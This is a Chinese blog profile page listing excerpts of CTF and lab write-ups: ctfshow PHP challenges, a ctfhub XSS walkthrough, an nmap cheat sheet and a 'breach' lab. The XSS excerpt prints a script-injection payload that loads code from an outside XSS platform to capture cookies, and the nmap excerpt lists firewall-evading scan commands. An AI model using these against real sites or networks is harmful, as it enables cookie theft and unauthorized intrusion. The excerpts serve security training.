- 博客(6)
- 收藏
- 关注
原创 ctfshow 限时活动 红包挑战7和红包挑战8详细答案和见解
这里的意思是extract()函数(传进来的必须是数组)来处理$_GET传入的参数,我起初一直在由于为什么,我传入的是value,name而不是value[],name[]为什么可以呢,是我太无知了。传入1=/usr/local/lib/php/extensions(是php扩展一个常见的默认安装目录)列出 /usr/local/lib/php/extensions/ 目录下的文件和子目录。函数这里思考了, 我们可以利用ini_set函数来暂时修改php.ini中的PHP配置 ,其中这里可以利用的方法是。
2023-08-14 20:48:16 284 1
原创 ctfhub-技能树-xss题集全部习题详解-最新
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
2023-08-10 22:40:24 4518 4
原创 ctfshow web11详解,小白补充session和PHPSESSID相关知识
当用户访问php网址时,服务器会将生成的PHPSESSID值发送给用户的浏览器,并保存在名为PHPSESSID的cookie中,浏览器在随后的请求中会自动将这个cookie发送回服务器,这样,服务器可以通过这个唯一的标识符识别用户,并获取与用户关联的会话数据。PHPSESSID cookie的值是随机生成的,并且大部分情况下是基于用户的会话信息和一些其他参数生成的哈希值,这样做是为了确保PHPSESSID的唯一性和安全性,以防会话劫持和其他安全漏洞。的,通常以文件或数据库的形式保存。
2023-07-30 15:15:30 412 1
原创 nmap命令使用大全,详细清晰
一、主机发现全面扫描/综合扫描 nmap -A 192.168.1.103 Ping 扫描 nmap -sP 192.168.1.1/24 免 Ping 扫描,穿透防火墙,避免被防火墙发现 nmap -P0 192.168.1.103 TCP SYN Ping 扫描 nmap -PS -v 192.168.1.103 nmap -PS80,10-100 -v 192.168.1.103 (针对防火墙丢弃 RST 包) TCP ACK Ping 扫描 nmap -PA -v 192
2023-07-18 17:48:19 14712 1
原创 breach靶场练习详细全过程
1.这次的靶场打的我比较震惊的,长见识了,真的很明显的感受到信息搜索和分析的力量,有种睿智的推理家的感觉了,特别是到后面推测用户blumbergh与bill微妙的关系,以及最后blumbergh的密码是隐藏在bill的图片里,是需要一大段信息的搜索和条理清晰的分析才能得到的推断的,要有耐心,不放过任何一条线索。
2023-07-18 17:47:10 463 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人